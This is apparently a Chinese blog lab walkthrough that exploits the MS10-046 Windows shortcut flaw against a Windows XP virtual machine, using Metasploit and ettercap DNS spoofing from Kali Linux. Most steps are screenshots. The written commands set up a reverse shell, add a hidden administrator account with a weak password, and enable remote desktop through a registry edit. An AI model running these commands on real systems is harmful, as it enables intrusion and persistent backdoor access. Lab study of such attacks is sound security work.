#windowsxpsp3系统MS10-046漏洞测试

一、影响环境
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。

**二、**实验环境(虚拟机搭建)
目标主机:winxpsp3英文版:192.168.28.133
攻击主机:kaililinux:192.168.28.134
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、攻击过程

先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活

进入metasploit框架
Msfconsole

在这里插入图片描述

使用攻击模块

在这里插入图片描述

查看配置信息并设置

在这里插入图片描述

设置文件共享服务器的地址,为攻击机器
set srvhost 192.168.28.134
在这里插入图片描述

设置自己的ip地址,用于目标机器反弹shell
在这里插入图片描述

设置payload 用于反弹shell,这里是windows的
在这里插入图片描述

开始攻击
Expolit/run
在这里插入图片描述

诱导攻击
能够通过DNS挟持进一步利用MS10-046漏洞
进入到 /etc/ettercap/ 目录下
向目录下的 etter.dns 中添加欺骗的域名:
在这里插入图片描述在这里插入图片描述

连接会话
在这里插入图片描述

ettercap -T -q -i eth0 -P dns_spoof 192.168.28.133(目标ip)
在这里插入图片描述

一些命令

在这里插入图片描述

后渗透利用
Getuid
在这里插入图片描述

Shell
在这里插入图片描述

net user ouyang 123456 /add

在这里插入图片描述

net localgroup administrators ouyang /add
在这里插入图片描述

创建用户完毕后,打开3389远程桌面连接端口
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

在这里插入图片描述

查看机器是否打开了3389
在这里插入图片描述

远程桌面连接
在这里插入图片描述

链接成功
在这里插入图片描述

获取完信息之后删除用户
在这里插入图片描述

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页